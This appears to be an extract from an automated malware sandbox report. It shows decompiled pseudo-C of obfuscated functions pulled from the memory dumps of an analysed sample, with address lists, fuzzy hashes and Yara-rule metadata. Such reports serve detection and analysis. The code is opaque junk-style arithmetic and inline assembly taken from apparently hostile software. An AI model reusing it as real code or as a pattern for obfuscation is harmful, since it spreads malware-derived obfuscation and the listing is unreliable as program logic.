														asm("sbb edx, [0x93b52b83]");
														asm("adc ebp, [0x9b38133d]");
														_t49 = _t49 +  *0x359c84b4;
														_t54 = _t54 &  *0xdb5b4dc0;
														asm("adc ecx, 0xc547de92");
														_push( *0xdf038bf3);
														asm("rcl byte [0xad722e2], 0x17");
														 *0x6c5d652a =  *0x6c5d652a + _t46;
														asm("sbb ah, [0xf5d2cf2c]");
														 *0x3a08c695 = 0x4b0f1676;
														_push(0x8bc16a1e);
													} while (( *0x98d0263f & 0xa9f28bd8) != 0);
													asm("adc esi, 0xdc14647b");
													_t46 = _t46 - 1;
													 *0x31a4ba03 =  *0x31a4ba03 << 0xbc;
													 *0x53bc9564 =  *0x53bc9564 & 0xa9f28bd8;
													 *0x7ce8e6f4 =  *0x7ce8e6f4 << 0x8e;
													_t67 = _t67 - 0x2ddb22c2;
													 *0x2b41d9f9 =  *0x2b41d9f9 >> 0x15;
													 *0x11774c30 =  *0x11774c30 << 0x33;
													_t71 = _t71 ^ 0x7c6b55cb;
													_t73 = _t73 +  *0xe8313764;
													_t49 = 0x480d832e ^  *0x757162e3;
												} while (_t49 != 0);
												 *0x7d8e83e0 = _t54;
												asm("sbb eax, 0xf3eddf65");
												asm("sbb [0x61f8b91a], dh");
												asm("adc edx, 0x3d743c39");
												asm("cmpsw");
												asm("ror byte [0xa776fff2], 0xf9");
												 *0x6b95c4ef =  *0x6b95c4ef | _t71 &  *0x867701de;
												_push(_t49);
												asm("cmpsb");
												 *0x1be2c49f =  *0x7d8e83e0;
												asm("adc eax, 0x701e721");
												 *0x52bb42d9 =  *0x52bb42d9 << 0x6d;
												_push( *0x25fb150d);
												return  *0x44532e6a * 0xecb7;
											} else {
												__ebx = __ebx |  *0x6e181474;
												__eflags =  *0x23765b97 - __eax;
												asm("sbb ecx, [0x37131762]");
												_pop(__edx);
												__eax = __eax - 1;
												_t41 = __ecx;
												__ecx =  *0xe5690f8d;
												 *0xe5690f8d = _t41;
												_t42 = __ebp;
												__ebp =  *0xf594ce0d;
												 *0xf594ce0d = _t42;
												__ah = __ah -  *0xe0bd9700;
												asm("sbb [0xa07510d], esp");
												 *0xe8133b2c =  *0xe8133b2c - __bl;
												asm("lodsb");
												 *0xc2a88b27 =  *0xc2a88b27 | __edx;
												 *0xaeae1e4 =  *0xaeae1e4 << 0x5a;
												__ecx =  *0xe5690f8d + 1;
												__ebx = __ebx ^  *0x4f6f40ed;
												__edi =  *0x13e8be15;
												__edx = __edx ^  *0x503b5bf7;
												__ebx = __ebx -  *0x9815e633;
												__eax = __eax - 0x383eb8f7;
												__edi =  *0x13e8be15 &  *0x4f6fbddc;
												__edx = 0xfe8be15;
												 *0xa85a80d4 = __ebx;
												asm("sbb [0x67b61cf7], edx");
												__ebp =  *0xf594ce0d &  *0x129fef6f;
												__eflags =  *0x12e39ae0 & __ch;
												asm("adc [0x3ba83fd9], ebx");
												__eflags = __eax -  *0xadb5af95;
												 *0x99223a38 =  *0x99223a38 - __bh;
												__ecx =  *0x239eabc4;
												_push(__ebx);
												__esp = __esp + 0x8ca61483;
												 *0x3693a161 =  *0x3693a161 >> 0xc1;
												__eflags =  *0x3693a161;
												return __eax;
											}
										}
									}
								}
							}
						}
					}
				}
			}











                                                                                                    0x0044c021
                                                                                                    0x0044c021
                                                                                                    0x0044c021
                                                                                                    0x0044c021
                                                                                                    0x0044c021
                                                                                                    0x0044c021
                                                                                                    0x0044c022
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4ac
                                                                                                    0x0044b4b2
                                                                                                    0x0044c028
                                                                                                    0x0044c028
                                                                                                    0x0044c02f
                                                                                                    0x0044c036
                                                                                                    0x0044c03c
                                                                                                    0x0044c043
                                                                                                    0x0044c049
                                                                                                    0x0044c04f
                                                                                                    0x0044c055
                                                                                                    0x0044c05b
                                                                                                    0x0044c060
                                                                                                    0x0044c067
                                                                                                    0x0044c06d
                                                                                                    0x0044c073
                                                                                                    0x0044c076
                                                                                                    0x0044c07c
                                                                                                    0x0044c082
                                                                                                    0x0044c088
                                                                                                    0x0044c089
                                                                                                    0x0044c08f
                                                                                                    0x0044c095
                                                                                                    0x0044c096
                                                                                                    0x0044c097
                                                                                                    0x0044c097
                                                                                                    0x0044c0a1
                                                                                                    0x0044c0a2
                                                                                                    0x00000000
                                                                                                    0x0044c0a8
                                                                                                    0x0044c0a8
                                                                                                    0x0044c0ad
                                                                                                    0x0044c0b3
                                                                                                    0x0044c0b4
                                                                                                    0x0044c0bb
                                                                                                    0x0044c0c1
                                                                                                    0x0044c0c4
                                                                                                    0x0044c0ca
                                                                                                    0x0044c0d0
                                                                                                    0x0044c0d1
                                                                                                    0x0044c0d7
                                                                                                    0x0044c0dd
                                                                                                    0x0044c0e3
                                                                                                    0x0044c0e9
                                                                                                    0x0044c0e9
                                                                                                    0x0044c0f3
                                                                                                    0x0044c0fa
                                                                                                    0x00000000
                                                                                                    0x0044c100
                                                                                                    0x0044c100
                                                                                                    0x0044c106
                                                                                                    0x0044c10c
                                                                                                    0x0044c112
                                                                                                    0x0044c112
                                                                                                    0x0044c118
                                                                                                    0x00000000
                                                                                                    0x0044c11e
                                                                                                    0x0044c11e
                                                                                                    0x0044c124
                                                                                                    0x0044c12a
                                                                                                    0x00000000
                                                                                                    0x0044c130
                                                                                                    0x0044c130
                                                                                                    0x0044c136
                                                                                                    0x0044c13d
                                                                                                    0x0044c143
                                                                                                    0x0044c149
                                                                                                    0x0044c14f
                                                                                                    0x0044c150
                                                                                                    0x0044c156
                                                                                                    0x0044c15c
                                                                                                    0x0044c162
                                                                                                    0x0044c163
                                                                                                    0x0044c163
                                                                                                    0x0044c169
                                                                                                    0x0044c169
                                                                                                    0x0044c169
                                                                                                    0x0044c16f
                                                                                                    0x00000000
                                                                                                    0x0044c175
                                                                                                    0x0044c175
                                                                                                    0x0044c17c
                                                                                                    0x0044c183
                                                                                                    0x0044c189
                                                                                                    0x0044c18a
                                                                                                    0x0044c18b
                                                                                                    0x0044c192
                                                                                                    0x0044c194
                                                                                                    0x0044c195
                                                                                                    0x0044c19c
                                                                                                    0x0044c19e
                                                                                                    0x0044c19f
                                                                                                    0x0044c1a6
                                                                                                    0x0044c1ac
                                                                                                    0x0044c1ac
                                                                                                    0x0044c1ac
                                                                                                    0x0044c1b2
                                                                                                    0x0044c1b8
                                                                                                    0x0044c1be
                                                                                                    0x0044c1c4
                                                                                                    0x0044c1c7
                                                                                                    0x0044c1cd
                                                                                                    0x0044c1d3
                                                                                                    0x0044c1d9
                                                                                                    0x0044c1df
                                                                                                    0x0044c1e5
                                                                                                    0x0044c1e6
                                                                                                    0x0044c1ec
                                                                                                    0x0044c1f3
                                                                                                    0x0044c1f8
                                                                                                    0x0044c1fe
                                                                                                    0x0044c204
                                                                                                    0x0044c205
                                                                                                    0x0044c20b
                                                                                                    0x0044c20c
                                                                                                    0x0044c20d
                                                                                                    0x0044c213
                                                                                                    0x0044c219
                                                                                                    0x0044c21f
                                                                                                    0x0044c225
                                                                                                    0x0044c22b
                                                                                                    0x0044c232
                                                                                                    0x0044c232
                                                                                                    0x0044c238
                                                                                                    0x0044c23e
                                                                                                    0x0044c244
                                                                                                    0x0044c24a
                                                                                                    0x0044c251
                                                                                                    0x0044c258
                                                                                                    0x00000000
                                                                                                    0x0044c25e
                                                                                                    0x0044c25e
                                                                                                    0x0044c264
                                                                                                    0x0044c26a
                                                                                                    0x0044c270
                                                                                                    0x0044c276
                                                                                                    0x0044c27d
                                                                                                    0x0044c283
                                                                                                    0x0044c284
                                                                                                    0x0044c28a
                                                                                                    0x0044c290
                                                                                                    0x0044c296
                                                                                                    0x0044c29d
                                                                                                    0x0044c2a3
                                                                                                    0x0044c2a9
                                                                                                    0x0044c2af
                                                                                                    0x0044c2b0
                                                                                                    0x0044c2b7
                                                                                                    0x0044c2b8
                                                                                                    0x0044c2be
                                                                                                    0x0044c2c4
                                                                                                    0x0044c2c4
                                                                                                    0x0044c2c5
                                                                                                    0x0044c2c6
                                                                                                    0x00000000
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0044b4c0
                                                                                                    0x0044b4cc
                                                                                                    0x0044b4d3
                                                                                                    0x0044b4d4
                                                                                                    0x0044b4da
                                                                                                    0x0044b4e0
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4fe
                                                                                                    0x0044b504
                                                                                                    0x0044b504
                                                                                                    0x0044b50a
                                                                                                    0x0044b510
                                                                                                    0x0044b517
                                                                                                    0x0044b517
                                                                                                    0x0044b51f
                                                                                                    0x0044b532
                                                                                                    0x0044b539
                                                                                                    0x0044b548
                                                                                                    0x0044b54e
                                                                                                    0x0044b560
                                                                                                    0x0044b566
                                                                                                    0x0044b56c
                                                                                                    0x0044b56c
                                                                                                    0x0044b572
                                                                                                    0x0044b572
                                                                                                    0x0044b581
                                                                                                    0x0044b595
                                                                                                    0x0044b5a1
                                                                                                    0x0044b5a7
                                                                                                    0x0044b5a8
                                                                                                    0x0044b5af
                                                                                                    0x0044b5b6
                                                                                                    0x0044b5b7
                                                                                                    0x0044b5b8
                                                                                                    0x0044b5be
                                                                                                    0x0044b5c4
                                                                                                    0x0044b5c6
                                                                                                    0x0044b5cc
                                                                                                    0x0044b5cd
                                                                                                    0x0044b5d3
                                                                                                    0x0044b5df
                                                                                                    0x0044b5e5
                                                                                                    0x0044b5eb
                                                                                                    0x0044b5f1
                                                                                                    0x0044b5f7
                                                                                                    0x0044b5fe
                                                                                                    0x0044b604
                                                                                                    0x0044b60a
                                                                                                    0x0044b616
                                                                                                    0x0044b616
                                                                                                    0x0044b621
                                                                                                    0x0044b627
                                                                                                    0x0044b628
                                                                                                    0x0044b62f
                                                                                                    0x0044b635
                                                                                                    0x0044b643
                                                                                                    0x0044b64e
                                                                                                    0x0044b655
                                                                                                    0x0044b65c
                                                                                                    0x0044b662
                                                                                                    0x0044b668
                                                                                                    0x0044b668
                                                                                                    0x0044b67a
                                                                                                    0x0044b680
                                                                                                    0x0044b685
                                                                                                    0x0044b68b
                                                                                                    0x0044b697
                                                                                                    0x0044b6a5
                                                                                                    0x0044b6ac
                                                                                                    0x0044b6b2
                                                                                                    0x0044b6b4
                                                                                                    0x0044b6b6
                                                                                                    0x0044b6bc
                                                                                                    0x0044b6cd
                                                                                                    0x0044b6d4
                                                                                                    0x0044b6e5
                                                                                                    0x0044c2cc
                                                                                                    0x0044c2cc
                                                                                                    0x0044c2d2
                                                                                                    0x0044c2d8
                                                                                                    0x0044c2de
                                                                                                    0x0044c2df
                                                                                                    0x0044c2e0
                                                                                                    0x0044c2e0
                                                                                                    0x0044c2e0
                                                                                                    0x0044c2e6
                                                                                                    0x0044c2e6
                                                                                                    0x0044c2e6
                                                                                                    0x0044c2ec
                                                                                                    0x0044c2f2
                                                                                                    0x0044c2f8
                                                                                                    0x0044c2ff
                                                                                                    0x0044c300
                                                                                                    0x0044c306
                                                                                                    0x0044c30d
                                                                                                    0x0044c30e
                                                                                                    0x0044c314
                                                                                                    0x0044c31a
                                                                                                    0x0044c320
                                                                                                    0x0044c326
                                                                                                    0x0044c32b
                                                                                                    0x0044c331
                                                                                                    0x0044c337
                                                                                                    0x0044c33d
                                                                                                    0x0044c343
                                                                                                    0x0044c349
                                                                                                    0x0044c34f
                                                                                                    0x0044c355
                                                                                                    0x0044c35b
                                                                                                    0x0044c361
                                                                                                    0x0044c367
                                                                                                    0x0044c368
                                                                                                    0x0044c36e
                                                                                                    0x0044c36e
                                                                                                    0x0044c375
                                                                                                    0x0044c375
                                                                                                    0x0044c2c6
                                                                                                    0x0044c258
                                                                                                    0x0044c16f
                                                                                                    0x0044c12a
                                                                                                    0x0044c118
                                                                                                    0x0044c0fa
                                                                                                    0x0044c0a2

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d037a77b1f834e8b2fcd5b3ee064cbe8963a1613bd2b8bd5626840b0d516a767
                                                                                                    • Instruction ID: c00e740dd17322fa93950e0a00d4a4d55b13049c4410f98aa7bf5e82400fd536
                                                                                                    • Opcode Fuzzy Hash: d037a77b1f834e8b2fcd5b3ee064cbe8963a1613bd2b8bd5626840b0d516a767
                                                                                                    • Instruction Fuzzy Hash: F9D1A932918795CFE716CF34D98AB023FB2F786720B08878ED49197582C379651ADF86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00ABEBB0, Relevance: .2, Instructions: 250COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                                                    • Instruction ID: b504e35168a1dfa42259bf2e8ff43733b7657d4f72e1c8296ea62e0bcaf6c5d8
                                                                                                    • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                                                                                    • Instruction Fuzzy Hash: BD812A31A152598BDB259EA8C4D02FDBF79EF93300B38457AE9428B243C3659C45E7E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B525DD, Relevance: .2, Instructions: 232COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a04f26539b21e8a2ce2734e479dcb66a7db7559834043319c64f51f73202980
                                                                                                    • Instruction ID: 7f480782fa630da9ac20b5b2ce4c50bd9032d5891f2cdd766f396b5495183851
                                                                                                    • Opcode Fuzzy Hash: 4a04f26539b21e8a2ce2734e479dcb66a7db7559834043319c64f51f73202980
                                                                                                    • Instruction Fuzzy Hash: 2381E372B001158FDF08CF79C8916BEBBF1EF89311B1982E9D865EB295DA349905CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB6A60, Relevance: .2, Instructions: 227COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1a35b1443b4f7163d4837c03bebd125096860b4a84e51db66b1d19a7c00c31b6
                                                                                                    • Instruction ID: 28a595dc8d16f91810c1d640e849a39aa3c9a598811967f73ac379c9d41fd1b7
                                                                                                    • Opcode Fuzzy Hash: 1a35b1443b4f7163d4837c03bebd125096860b4a84e51db66b1d19a7c00c31b6
                                                                                                    • Instruction Fuzzy Hash: 01815C71A002199FDB24CF98C981BFEBBB5EF08350F158069EA49EB241D735AD45CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B51D55, Relevance: .2, Instructions: 226COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5adb1f32e4fa0dd4e61510cd20ddda5428d27613471d5550cd87d1df3240612
                                                                                                    • Instruction ID: ade5441051b95f823f23c1a935aa3267ba7867909716f2b936bcf04f8a7b9236
                                                                                                    • Opcode Fuzzy Hash: b5adb1f32e4fa0dd4e61510cd20ddda5428d27613471d5550cd87d1df3240612
                                                                                                    • Instruction Fuzzy Hash: D6813A71A042198BCF18DFA8C881BECB7F1EF49315B2446A9E816AB3D5DB319949CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A8C600, Relevance: .2, Instructions: 225COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a7b6ed9f337f87214fdc82f69239f3279260b7dadd8d54411f671fd58ca15f53
                                                                                                    • Instruction ID: 5940d5cb1b861b701673e33be0de1430322409d368a9c42c09bfc009db0b0c86
                                                                                                    • Opcode Fuzzy Hash: a7b6ed9f337f87214fdc82f69239f3279260b7dadd8d54411f671fd58ca15f53
                                                                                                    • Instruction Fuzzy Hash: 87819E756082098FCB26DF94C881E7FB3A5EB84390F25486AFE469B241D730DD41CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044BDEA, Relevance: .2, Instructions: 219COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 40%
                                                                                                    			E0044BDEA(signed int __eax, signed int __ebx, signed char __ecx, signed int __edx, signed int __esi) {
				signed char _t37;
				signed char _t40;
				signed char _t43;
				signed char _t44;
				signed int _t48;
				signed int _t63;
				signed int _t67;
				signed int _t69;

				_t48 = __edx;
				_t43 = __ecx;
				_t37 = __eax;
				_t40 = __ebx |  *0x3e0f20e7;
				 *0x6f65d09c =  *0x6f65d09c ^ __eax;
				_t63 = (__esi &  *0x3884bde9) -  *0xe0129ff3;
				asm("adc ecx, [0x7b18e39a]");
				asm("adc ebx, 0x909e700b");
				asm("adc [0xfbf457b3], al");
				_push( *0x3b72c362);
				asm("adc ecx, [0x3b388acc]");
				_push(0xbdd269d3);
				asm("lodsd");
				 *0xcb7fec0a =  *0xcb7fec0a - __edx;
				if( *0xcb7fec0a < 0) {
					L1:
					_t67 = _t67 -  *0xd6d4e09;
					_push( *0x92af3c21);
					asm("adc edi, [0xdd0dd9fc]");
				} else {
					__edx =  *0x6b018c7c * 0xb510;
					__edi = __edi + 1;
					__esi = __esi - 1;
					__edi = __edi |  *0x7eda2a62;
					asm("movsw");
					__esi = __esi - 1;
					asm("rcr dword [0xbbe83c0f], 0x10");
					__ebp = __ebp - 0x298ddaff;
					__esp = 0x129f5f1f;
					asm("adc ah, [0xfe39ae0]");
					 *0x10bd76a1 =  *0x10bd76a1 - __ebp;
					__esi =  *0x6a60b227;
					asm("rcr dword [0xbf0ee39a], 0x7d");
					__esp = 0x129f5f1f -  *0x9150ed6c;
					_t25 = __edi;
					__edi =  *0xc8b0bc98;
					 *0xc8b0bc98 = _t25;
					__edi =  *0xc8b0bc98 ^  *0xe4f60cb9;
					asm("sbb ebp, [0x8ed3efbf]");
					__edx =  *0x6b018c7c * 0xb510 - 1;
					__edi = 0xc2559e03;
					asm("sbb [0xf2f0edb], esi");
					asm("rol dword [0x5518c39d], 0xea");
					__esi =  *0x6a60b227 ^  *0xb9c8b0bc;
					 *0x574fe715 =  *0x574fe715 - 0xc2559e03;
					__ecx = __ecx ^ 0x10cf739c;
					 *0x7e256f3a =  *0x7e256f3a + __ah;
					 *0x337cc123 =  *0x337cc123 >> 0x20;
					__cl = __cl | 0x000000b3;
					 *0x9d3f789c =  *0x9d3f789c - __ecx;
					__esi = ( *0x6a60b227 ^  *0xb9c8b0bc) - 1;
					__ah = __ah ^ 0x00000010;
					asm("rol byte [0xe0a29324], 0xc2");
					asm("rol byte [0x86556dca], 0xbf");
					asm("rol dword [0x17b72b99], 0x50");
					_push(0xfc97230d);
					__dh = __dh -  *0x3383de10;
					__esi =  *0xa075125;
					 *0xa075125 = ( *0x6a60b227 ^  *0xb9c8b0bc) - 1;
					asm("ror byte [0xaa133b2c], 0xb5");
					__edi =  *0x2417d39a;
					 *0x2417d39a = 0xc2559e03;
					 *0x154f6fb6 =  *0x154f6fb6 << 0xc0;
					 *0x680ce8be =  *0x680ce8be << 0xe;
					__esi =  *0xa075125 & 0xf7a429cd;
					 *0xb00ddbc2 =  *0xb00ddbc2 ^ __edx;
					asm("ror byte [0x4bc31a2], 0x96");
					 *0x5125329b =  *0x5125329b << 0x70;
					__ecx =  *0x3b2c0a07;
					 *0xc571850c =  *0xc571850c ^ __ah;
					__esp = 0x129f5f1f -  *0x9150ed6c -  *0x3a9c15f5;
					asm("adc [0xc2559e03], edi");
					asm("adc [0x136c1684], cl");
					asm("sbb [0x1be597a8], ah");
					asm("rcr dword [0xa0b047f1], 0x79");
					__dl = __dl ^ 0x00000022;
					 *0xbc0e14ca =  *0xbc0e14ca - __bh;
					__edx = __edx - 0x49972f9b;
					 *0xef49f52a =  *0xef49f52a | __cl;
					asm("rcr dword [0xab302035], 0x4f");
					__edx = __ebp;
					asm("sbb dl, 0xb1");
					asm("lodsb");
					__ebp = __edx;
					__ecx =  *0x3b2c0a07 | 0x1b650e6c;
					 *0x9fe701ed =  *0x9fe701ed >> 0xe;
					asm("sbb [0x988f50dc], eax");
					__ebp = __ebp |  *0xb9c8b0bc;
					 *0xecd51210 =  *0xecd51210 << 0xe2;
					if( *0xecd51210 != 0) {
						goto L1;
						do {
							do {
								do {
									do {
										do {
											do {
												goto L1;
											} while (_t67 >= 0);
											_t44 = _t43 - 1;
											asm("rol dword [0xa9553596], 0xc3");
											_t63 = _t63 + 1;
											 *0xe0879028 =  *0xe0879028 | _t44;
											_t43 = _t44 +  *0x8dbda16;
											_t48 = 0xc3b1061 -  *0x29e2c8dc;
											_push( *0x6f95ed05);
										} while (0xc3b1061 >= 0xff834b9);
										_t63 = _t63 & 0x3491e20e;
										_t43 =  *0xf0ece6bd;
										 *0xf0ece6bd =  *0x310d487d * 0xc9ee;
										 *0x54133b1e =  *0x54133b1e ^ _t67;
										asm("rol dword [0x49f2711d], 0x37");
										asm("sbb edi, [0xf6fb63f0]");
									} while ( *0x54133b1e >= 0);
									_t67 = _t67 -  *0xf052e179;
									 *0x898fdca2 =  *0x898fdca2 << 0x59;
									asm("sbb esi, 0x7a830803");
									asm("sbb dl, [0xedb00aca]");
									asm("sbb ah, [0x86651c38]");
									 *0xb4e1bdb = _t48;
									_t69 = _t69 ^  *0x1d05d9df;
									_t48 =  *0x4863efee;
									 *0x4863efee =  *0xb4e1bdb;
									_t40 = (_t40 | 0x0000003a) &  *0xce97fdce | 0x0000000a;
								} while (_t40 > 0);
								 *0x34facd17 =  *0x34facd17 << 0xd0;
								asm("adc ecx, 0xce473839");
								asm("adc [0xdd4b29e2], dl");
								asm("lodsd");
								asm("rol byte [0x3abc98a2], 0x27");
								_t63 = 0xa9f28bd8 +  *0x12e391ce;
								_push(_t69);
								_push(_t67);
								 *0x1bf947f0 =  *0x1bf947f0 - _t69;
								_t69 = _t69 ^ 0x0286d09b;
								_t37 = _t37 & 0x000000d2;
								asm("sbb eax, [0x8260a58e]");
								_t40 = _t40 - 1;
								asm("sbb edx, [0x93b52b83]");
								asm("adc ebp, [0x9b38133d]");
								_t43 = _t43 +  *0x359c84b4;
								_t48 = _t48 &  *0xdb5b4dc0;
								asm("adc ecx, 0xc547de92");
								_push( *0xdf038bf3);
								asm("rcl byte [0xad722e2], 0x17");
								 *0x6c5d652a =  *0x6c5d652a + _t40;
								asm("sbb ah, [0xf5d2cf2c]");
								 *0x3a08c695 = 0x4b0f1676;
								_push(0x8bc16a1e);
							} while (( *0x98d0263f & 0xa9f28bd8) != 0);
							asm("adc esi, 0xdc14647b");
							_t40 = _t40 - 1;
							 *0x31a4ba03 =  *0x31a4ba03 << 0xbc;
							 *0x53bc9564 =  *0x53bc9564 & 0xa9f28bd8;
							 *0x7ce8e6f4 =  *0x7ce8e6f4 << 0x8e;
							_t63 = _t63 - 0x2ddb22c2;
							 *0x2b41d9f9 =  *0x2b41d9f9 >> 0x15;
							 *0x11774c30 =  *0x11774c30 << 0x33;
							_t67 = _t67 ^ 0x7c6b55cb;
							_t69 = _t69 +  *0xe8313764;
							_t43 = 0x480d832e ^  *0x757162e3;
						} while (_t43 != 0);
						 *0x7d8e83e0 = _t48;
						asm("sbb eax, 0xf3eddf65");
						asm("sbb [0x61f8b91a], dh");
						asm("adc edx, 0x3d743c39");
						asm("cmpsw");
						asm("ror byte [0xa776fff2], 0xf9");
						 *0x6b95c4ef =  *0x6b95c4ef | _t67 &  *0x867701de;
						_push(_t43);
						asm("cmpsb");
						 *0x1be2c49f =  *0x7d8e83e0;
						asm("adc eax, 0x701e721");
						 *0x52bb42d9 =  *0x52bb42d9 << 0x6d;
						_push( *0x25fb150d);
						return  *0x44532e6a * 0xecb7;
					} else {
						asm("sbb ebx, [0x9092d57b]");
						 *0xe5dcdec6 =  *0xe5dcdec6 >> 0xd2;
						__edi = __edi + 1;
						 *0xca22a0b0 =  *0xca22a0b0 >> 0x99;
						 *0xa4be0f23 = __ecx;
						__edx = __edx | 0xf08aea93;
						__ecx =  *0xed7a0f6a * 0x397c;
						__esp = __esp - 1;
						__eax = __eax - 1;
						__eax = __eax | 0xe5690f8d;
						_pop( *0x7966d815);
						return __eax;
					}
				}
			}











                                                                                                    0x0044bdea
                                                                                                    0x0044bdea
                                                                                                    0x0044bdea
                                                                                                    0x0044bdf0
                                                                                                    0x0044bdfc
                                                                                                    0x0044be02
                                                                                                    0x0044be08
                                                                                                    0x0044be0e
                                                                                                    0x0044be14
                                                                                                    0x0044be1a
                                                                                                    0x0044be20
                                                                                                    0x0044be26
                                                                                                    0x0044be2b
                                                                                                    0x0044be36
                                                                                                    0x0044be3c
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4ac
                                                                                                    0x0044b4b2
                                                                                                    0x0044be42
                                                                                                    0x0044be42
                                                                                                    0x0044be4c
                                                                                                    0x0044be4d
                                                                                                    0x0044be4e
                                                                                                    0x0044be54
                                                                                                    0x0044be56
                                                                                                    0x0044be57
                                                                                                    0x0044be5e
                                                                                                    0x0044be67
                                                                                                    0x0044be6d
                                                                                                    0x0044be76
                                                                                                    0x0044be7c
                                                                                                    0x0044be88
                                                                                                    0x0044be95
                                                                                                    0x0044be9b
                                                                                                    0x0044be9b
                                                                                                    0x0044be9b
                                                                                                    0x0044bea1
                                                                                                    0x0044bea7
                                                                                                    0x0044bead
                                                                                                    0x0044beae
                                                                                                    0x0044beb4
                                                                                                    0x0044beba
                                                                                                    0x0044bec7
                                                                                                    0x0044becd
                                                                                                    0x0044bed3
                                                                                                    0x0044bed9
                                                                                                    0x0044bedf
                                                                                                    0x0044bee6
                                                                                                    0x0044bee9
                                                                                                    0x0044beef
                                                                                                    0x0044bef0
                                                                                                    0x0044bef3
                                                                                                    0x0044befa
                                                                                                    0x0044bf01
                                                                                                    0x0044bf0e
                                                                                                    0x0044bf13
                                                                                                    0x0044bf19
                                                                                                    0x0044bf19
                                                                                                    0x0044bf1f
                                                                                                    0x0044bf2c
                                                                                                    0x0044bf2c
                                                                                                    0x0044bf38
                                                                                                    0x0044bf3f
                                                                                                    0x0044bf46
                                                                                                    0x0044bf53
                                                                                                    0x0044bf59
                                                                                                    0x0044bf60
                                                                                                    0x0044bf67
                                                                                                    0x0044bf6d
                                                                                                    0x0044bf73
                                                                                                    0x0044bf79
                                                                                                    0x0044bf85
                                                                                                    0x0044bf8b
                                                                                                    0x0044bf91
                                                                                                    0x0044bf98
                                                                                                    0x0044bf9b
                                                                                                    0x0044bfa1
                                                                                                    0x0044bfa7
                                                                                                    0x0044bfad
                                                                                                    0x0044bfb4
                                                                                                    0x0044bfb6
                                                                                                    0x0044bfb9
                                                                                                    0x0044bfba
                                                                                                    0x0044bfbb
                                                                                                    0x0044bfc1
                                                                                                    0x0044bfc8
                                                                                                    0x0044bfce
                                                                                                    0x0044bfd4
                                                                                                    0x0044bfdb
                                                                                                    0x00000000
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
